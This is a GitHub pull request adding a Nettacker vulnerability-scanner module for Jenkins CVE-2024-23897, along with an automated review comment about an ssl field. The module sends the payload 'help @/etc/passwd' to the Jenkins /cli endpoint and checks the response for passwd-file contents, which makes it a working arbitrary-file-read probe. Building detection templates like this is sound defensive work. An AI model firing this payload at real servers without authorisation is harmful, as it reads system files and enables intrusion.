Skip to content

CVE 2024 23897 jenkins cli #1517

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open
Prajwal5755 wants to merge 5 commits into
base: master
Choose a base branch
from
Open

CVE 2024 23897 jenkins cli #1517

Changes from all commits
Commits
Show all changes
5 commits
Select commit Hold shift + click to select a range
d5d3ef6
Add CVE-2022-1388 F5 BIG-IP vulnerability detection module
Prajwal5755 Mar 22, 2026
ffab357
Added correct headers and multiple endpoints
Prajwal5755 Apr 9, 2026
db7c1d0
Add cve_2024_23897_jenkins_cli
Prajwal5755 Apr 15, 2026
569e175
Add jenkins_cve_2024_23897
Prajwal5755 Apr 15, 2026
a3e93ba
Adding ssl
Prajwal5755 Apr 16, 2026
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
56 changes: 56 additions & 0 deletions nettacker/modules/vuln/jenkins_cve_2024_23897.yaml
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,56 @@
info:
name: jenkins_cve_2024_23897_vuln
author: Prajwal G N (@Prajwal5755)
severity: 7.5
description: Detects Jenkins CVE-2024-23897 arbitrary file read via CLI argument parsing using @file syntax.
reference:
- https://www.jenkins.io/security/advisory/2024-01-24/
profiles:
- vuln
- jenkins
- cve

payloads:
- library: http
steps:

- method: post
timeout: 3
headers:
User-Agent: "{user_agent}"
Content-Type: "text/plain"
ssl: false

Comment on lines +17 to +23
Copy link
Copy Markdown
Contributor

@coderabbitai coderabbitai bot Apr 15, 2026

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

⚠️ Potential issue | 🟠 Major

Add explicit ssl on the HTTP step.

Line 17–22 defines the HTTP step without an explicit ssl field. Please set it explicitly to avoid ambiguous transport behavior across targets.

Suggested patch 
       - method: post
         timeout: 3
+        ssl: false
         headers:
           User-Agent: "{user_agent}"
           Content-Type: "text/plain"

Based on learnings: “Every HTTP step must include headers.User-Agent: "{user_agent}", ssl:, and the info block must include reference:.”

🤖 Prompt for AI Agents 
Verify each finding against the current code and only fix it if needed.

In `@nettacker/modules/vuln/jenkins_cve_2024_23897.yaml` around lines 17 - 22, The
HTTP step that currently shows method: post with headers.User-Agent and
Content-Type needs an explicit ssl field to avoid ambiguous transport—add ssl:
true (or ssl: false if this target is known plaintext) directly under the step
alongside timeout, and ensure the rule's info block includes a reference: entry
(e.g., info.reference: "CVE-2024-23897" or a vendor advisory) so the file
jenkins_cve_2024_23897.yaml contains headers.User-Agent: "{user_agent}", an
explicit ssl setting, and an info.reference value.

url:
nettacker_fuzzer:
input_format: "{{schema}}://{target}:{{ports}}{{path}}"
prefix: ""
interceptors: []
suffix: ""
data:
schema:
- "http"
- "https"
path:
- '/cli'
ports:
- 80
- 443
- 8080
- 8443


data: |
help @/etc/passwd

response:
log: "Confirmed CVE-2024-23897 vulnerability detected"
condition_type: and
conditions:
status_code:
regex: "200"
reverse: false
content:
regex: "(root:x:0|daemon:x:1)"
reverse: false